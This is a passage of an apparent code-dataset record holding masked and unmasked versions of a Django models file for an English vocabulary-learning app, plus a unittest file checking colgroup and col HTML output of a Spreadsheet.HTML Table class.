list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',\n word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in (forvo_meta.get('items') or []):\n if item.get('code', '') != 'en' or item.get('country', ''\n ) != 'United States':\n continue\n if ct > slen - 1:\n break\n sound_file = sounds[ct]\n is_best = self.preferred_pronunciation == item['id']\n if is_best:\n prefered_detected = True\n ret.append({'id': item['id'], 'by': item['username'], 'sex':\n item['sex'], 'src': sound_file, 'best': is_best})\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return 'Статистика слова {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n",
"step-2": "<mask token>\n\n\nclass Meaning(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n value = models.TextField(verbose_name='Значение')\n order = models.PositiveIntegerField(verbose_name='Порядок', default=0)\n examples = JSONField(null=True, blank=True)\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n\n class Meta:\n ordering = ['order']\n verbose_name = 'Доп. значение'\n verbose_name_plural = 'Доп. значения'\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n audio = models.FileField(upload_to='media/audio', verbose_name=\n 'Произношение')\n raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,\n null=True)\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return 'Произношение {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Произношение'\n verbose_name_plural = 'Произношения'\n\n\nclass PronunciationMeta(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n user = models.ForeignKey('auth.User', on_delete=models.CASCADE,\n verbose_name='Пользователь')\n is_user_know_meaning = models.BooleanField(default=False, verbose_name=\n 'Выучил значение')\n is_user_know_pronunciation = models.BooleanField(default=False,\n verbose_name='Выучил произношение')\n usage_count = models.PositiveIntegerField(default=0, verbose_name=\n 'Количество показов')\n last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=\n 'Дата последнего показа')\n preferred_pronunciation = models.PositiveIntegerField(default=0,\n verbose_name='forvo id препочтительного произношения')\n training_session = models.BooleanField(default=False, blank=False,\n verbose_name='Сеанс обучения')\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',\n '{}.json'.format(word_str))\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',\n word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',\n word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in (forvo_meta.get('items') or []):\n if item.get('code', '') != 'en' or item.get('country', ''\n ) != 'United States':\n continue\n if ct > slen - 1:\n break\n sound_file = sounds[ct]\n is_best = self.preferred_pronunciation == item['id']\n if is_best:\n prefered_detected = True\n ret.append({'id': item['id'], 'by': item['username'], 'sex':\n item['sex'], 'src': sound_file, 'best': is_best})\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return 'Статистика слова {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 
'Статистика'\n verbose_name_plural = 'Статистика'\n",
"step-3": "<mask token>\n\n\nclass Word(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n ordering = ['value']\n verbose_name = 'Слово'\n verbose_name_plural = 'Слова'\n\n\nclass Meaning(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n value = models.TextField(verbose_name='Значение')\n order = models.PositiveIntegerField(verbose_name='Порядок', default=0)\n examples = JSONField(null=True, blank=True)\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n\n class Meta:\n ordering = ['order']\n verbose_name = 'Доп. значение'\n verbose_name_plural = 'Доп. значения'\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n audio = models.FileField(upload_to='media/audio', verbose_name=\n 'Произношение')\n raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,\n null=True)\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return 'Произношение {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Произношение'\n verbose_name_plural = 'Произношения'\n\n\nclass PronunciationMeta(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n user = models.ForeignKey('auth.User', on_delete=models.CASCADE,\n verbose_name='Пользователь')\n is_user_know_meaning = models.BooleanField(default=False, verbose_name=\n 'Выучил значение')\n is_user_know_pronunciation = models.BooleanField(default=False,\n verbose_name='Выучил произношение')\n usage_count = models.PositiveIntegerField(default=0, verbose_name=\n 'Количество показов')\n last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=\n 'Дата последнего показа')\n preferred_pronunciation = models.PositiveIntegerField(default=0,\n verbose_name='forvo id препочтительного произношения')\n training_session = models.BooleanField(default=False, blank=False,\n verbose_name='Сеанс обучения')\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',\n '{}.json'.format(word_str))\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',\n word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',\n word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in (forvo_meta.get('items') or []):\n if item.get('code', '') != 'en' or item.get('country', ''\n ) != 'United States':\n continue\n if ct > slen - 1:\n break\n sound_file = sounds[ct]\n is_best = self.preferred_pronunciation == item['id']\n if is_best:\n prefered_detected = True\n ret.append({'id': item['id'], 'by': item['username'], 'sex':\n item['sex'], 'src': sound_file, 'best': is_best})\n ct += 
1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return 'Статистика слова {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n",
"step-4": "<mask token>\n\n\nclass Word(models.Model):\n value = models.CharField(max_length=50, verbose_name='Слово')\n spelling = models.CharField(max_length=250, verbose_name='Транскрипция')\n raw_od_article = JSONField(verbose_name='Сырые данные с OD')\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return self.value\n\n\n class Meta:\n ordering = ['value']\n verbose_name = 'Слово'\n verbose_name_plural = 'Слова'\n\n\nclass Meaning(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n value = models.TextField(verbose_name='Значение')\n order = models.PositiveIntegerField(verbose_name='Порядок', default=0)\n examples = JSONField(null=True, blank=True)\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n\n class Meta:\n ordering = ['order']\n verbose_name = 'Доп. значение'\n verbose_name_plural = 'Доп. значения'\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n audio = models.FileField(upload_to='media/audio', verbose_name=\n 'Произношение')\n raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,\n null=True)\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return 'Произношение {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Произношение'\n verbose_name_plural = 'Произношения'\n\n\nclass PronunciationMeta(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n user = models.ForeignKey('auth.User', on_delete=models.CASCADE,\n verbose_name='Пользователь')\n is_user_know_meaning = models.BooleanField(default=False, verbose_name=\n 'Выучил значение')\n is_user_know_pronunciation = models.BooleanField(default=False,\n verbose_name='Выучил произношение')\n usage_count = models.PositiveIntegerField(default=0, verbose_name=\n 'Количество показов')\n last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=\n 'Дата последнего показа')\n preferred_pronunciation = models.PositiveIntegerField(default=0,\n verbose_name='forvo id препочтительного произношения')\n training_session = models.BooleanField(default=False, blank=False,\n verbose_name='Сеанс обучения')\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',\n '{}.json'.format(word_str))\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',\n word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',\n word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in (forvo_meta.get('items') or []):\n if item.get('code', '') != 'en' or item.get('country', ''\n ) != 'United States':\n continue\n if ct > slen - 1:\n 
break\n sound_file = sounds[ct]\n is_best = self.preferred_pronunciation == item['id']\n if is_best:\n prefered_detected = True\n ret.append({'id': item['id'], 'by': item['username'], 'sex':\n item['sex'], 'src': sound_file, 'best': is_best})\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return 'Статистика слова {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n",
"step-5": "import json\nimport os\n\nfrom django.conf import settings\nfrom django.db import models\nfrom jsonfield import JSONField\n\n\nclass Word(models.Model):\n value = models.CharField(\n max_length=50,\n verbose_name='Слово'\n )\n spelling = models.CharField(\n max_length=250,\n verbose_name='Транскрипция'\n )\n raw_od_article = JSONField(\n verbose_name='Сырые данные с OD'\n )\n\n is_active = models.BooleanField(\n default=True,\n verbose_name='Используется'\n )\n\n def __str__(self):\n return self.value\n\n class Meta:\n ordering = [\"value\"]\n verbose_name = \"Слово\"\n verbose_name_plural = \"Слова\"\n\n\nclass Meaning(models.Model):\n word = models.ForeignKey(\n Word,\n on_delete=models.CASCADE,\n verbose_name='Слово'\n )\n value = models.TextField(\n verbose_name='Значение'\n )\n order = models.PositiveIntegerField(\n verbose_name=\"Порядок\",\n default=0\n )\n examples = JSONField(\n null=True,\n blank=True\n )\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n class Meta:\n ordering = [\"order\"]\n verbose_name = \"Доп. значение\"\n verbose_name_plural = \"Доп. значения\"\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(\n Word,\n on_delete=models.CASCADE,\n verbose_name='Слово'\n )\n audio = models.FileField(\n upload_to='media/audio',\n verbose_name='Произношение'\n )\n raw_od_data = JSONField(\n verbose_name='Сырые данные с OD',\n blank=True,\n null=True\n )\n is_active = models.BooleanField(\n default=True,\n verbose_name='Используется'\n )\n\n def __str__(self):\n return \"Произношение {}\".format(self.word)\n\n class Meta:\n verbose_name = \"Произношение\"\n verbose_name_plural = \"Произношения\"\n\n\nclass PronunciationMeta(object):\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(\n Word,\n on_delete=models.CASCADE,\n verbose_name='Слово'\n )\n user = models.ForeignKey(\n \"auth.User\",\n on_delete=models.CASCADE,\n verbose_name='Пользователь'\n )\n is_user_know_meaning = models.BooleanField(\n default=False,\n verbose_name='Выучил значение'\n )\n is_user_know_pronunciation = models.BooleanField(\n default=False,\n verbose_name='Выучил произношение'\n )\n usage_count = models.PositiveIntegerField(\n default=0,\n verbose_name='Количество показов'\n )\n last_usage_date = models.DateTimeField(\n auto_now_add=True,\n verbose_name='Дата последнего показа'\n )\n preferred_pronunciation = models.PositiveIntegerField(\n default=0,\n verbose_name='forvo id препочтительного произношения',\n )\n training_session = models.BooleanField(\n default=False,\n blank=False,\n verbose_name='Сеанс обучения'\n )\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(\n settings.BASE_DIR, 'media', 'forvo', '{}.json'.format(word_str)\n )\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds', word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds', word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n\n ret = []\n ct 
= 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in forvo_meta.get('items') or []:\n\n if item.get('code', '') != 'en' or item.get(\n 'country', '') != 'United States':\n continue\n\n if ct > slen-1:\n break\n\n sound_file = sounds[ct]\n\n is_best = self.preferred_pronunciation == item['id']\n\n if is_best:\n prefered_detected = True\n\n ret.append({\n 'id': item['id'],\n 'by': item['username'],\n 'sex': item['sex'],\n 'src': sound_file,\n 'best': is_best\n })\n\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return \"Статистика слова {}\".format(self.word)\n\n class Meta:\n verbose_name = \"Статистика\"\n verbose_name_plural = \"Статистика\"\n",
"step-ids": [
13,
14,
15,
17,
19
]
}
|
[
13,
14,
15,
17,
19
] |
import unittest
from Spreadsheet.HTML import Table
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [
['a','b','c'],
[1,2,3],
[4,5,6],
]
gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } )
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate(),
"colgroup present from generate()"
)
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',
gen.generate( { 'tgroups': 2 } ),
"colgroup present from generate() with tgroups"
)
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': None } ),
"colgroup can be overriden"
)
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': 1 } ),
"colgroup yields no-op if scalar"
)
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': [ { 'span': 1, 'color': 'red' }, { 'span': 2, 'color': 'blue' } ] } ),
"can specify multiple colgroups"
)
def test_col(self):
return
data = [
['a','b','c'],
[1,2,3],
[4,5,6],
]
gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } );
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': {} } ),
"colgroup wraps col"
)
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': [{},{},{}] } ),
"colgroup wraps multiple cols"
)
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': None, 'col': {} } ),
"colgroup can be overriden when col is present too"
)
gen = Table( { 'data': data, 'col': [{},{},{}] } );
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': {} } ),
"multiple cols against single colgroup"
)
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': None, 'colgroup': [{},{},{}] } ),
"no cols against multiple colgroups"
)
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': [{},{},{}] } ),
"multiple cols against multiple colgroups"
)
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "24f87bd6aab0ff65cf2153e27df31122818ad0ac",
"index": 766,
"step-1": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n <mask token>\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n 
, gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n 
